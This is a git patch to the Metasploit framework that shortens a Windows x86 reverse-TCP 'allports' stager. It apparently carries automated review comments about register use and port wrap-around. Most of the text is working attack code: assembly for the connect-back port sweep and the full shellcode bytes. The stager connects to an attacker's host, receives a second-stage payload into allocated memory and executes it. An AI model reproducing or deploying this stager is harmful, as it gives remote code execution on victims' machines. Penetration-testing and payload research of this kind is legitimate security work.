From bc2c38c33250e65d8714f50ef6169a0cdd730b6a Mon Sep 17 00:00:00 2001
From: James Lee
Date: Fri, 25 Sep 2009 06:13:13 +0000
Subject: [PATCH] shave an instruction from the new allports stager
git-svn-id: file:///home/svn/framework3/trunk@7060 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../src/block/block_reverse_tcp_allports.asm | 11 +++++------
 .../stagers/windows/reverse_tcp_allports.rb | 17 +++++++++--------
 2 files changed, 14 insertions(+), 14 deletions(-)
diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm
index 72995904c8..93ee3c48a0 100644
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm
@@ -40,6 +40,7 @@ set_address:
 push 0x5C110002 ; family AF_INET and port 1
 mov esi, esp ; save pointer to sockaddr struct
+ xor ebx, ebx
 try_connect:
 push byte 16 ; length of the sockaddr struct
 push esi ; pointer to the sockaddr struct
@@ -51,12 +52,10 @@ try_connect:
 jz short connected
 port_bump:
- xor eax, eax
- mov word ax, [esi+2]
- xchg ah,al
- inc ax
- xchg ah,al
- mov word [esi+2], ax
+ xchg bh,bl
+ inc bx
+ xchg bh,bl
+ mov word [esi+2], bx
 jmp short try_connect
 connected:
diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb
index f40d2df4c5..c60d952cf0 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb
@@ -35,7 +35,7 @@ module Metasploit3
 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], }, 'Payload' =>
- # Length: 294 bytes
+ # Length: 290 bytes
 # Port Offset: 202
 # Host Offset: 195
 "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
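Review bot: The added `xor ebx, ebx` ahead of try_connect changes where the port sweep resumes after a failed connect: EBX is never loaded from the sockaddr, so the first port_bump writes port 1 rather than LPORT+1 as the removed `mov word ax, [esi+2]` did. If trying LPORT once and then sweeping upward from 1 is the intent, state it on the new line, e.g. `xor ebx, ebx ; port counter: LPORT is tried once, then 1, 2, ... (clobbers EBX)`. The unchanged comment on `push 0x5C110002` still says port 1, but that immediate puts 0x115C (4444) in the network-order port field; worth correcting while this block is being touched. The routine's prologue and any register-contract header sit outside the hunk.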
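Review bot: The rewritten port_bump keeps the counter live in BX for the whole try_connect loop, whereas the removed code only used EAX as scratch, so EBX is now part of this block's register contract; the clobber list in the file header (outside this hunk) presumably does not mention EBX yet and should. `inc bx` wraps 0xFFFF to 0, so after the range is exhausted the sweep keeps cycling from port 0 with no exit of its own — unchanged from the old code, but a comment such as `inc bx ; host-order port; wraps to 0 after 65535, only a successful connect leaves the loop` would spare the next reader a trace. The connected: label's code continues outside the hunk.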
@@ -50,13 +50,14 @@ module Metasploit3
 "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
 "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
 "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
- "\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x01\x00\x89\xE6\x6A\x10" +
- "\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x12\x31\xC0\x66" +
- "\x8B\x46\x02\x86\xE0\x66\x40\x86\xE0\x66\x89\x46\x02\xEB\xDF\x6A" +
- "\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40" +
- "\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93" +
- "\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29" +
- "\xC6\x85\xF6\x75\xEC\xC3"
+ "\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x31\xDB" +
+ "\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\x86" +
+ "\xFB\x66\x43\x86\xFB\x66\x89\x5E\x02\xEB\xE5\x6A\x00\x6A\x04\x56" +
+ "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" +
+ "\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" +
+ "\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" + "\xEC\xC3" + } ))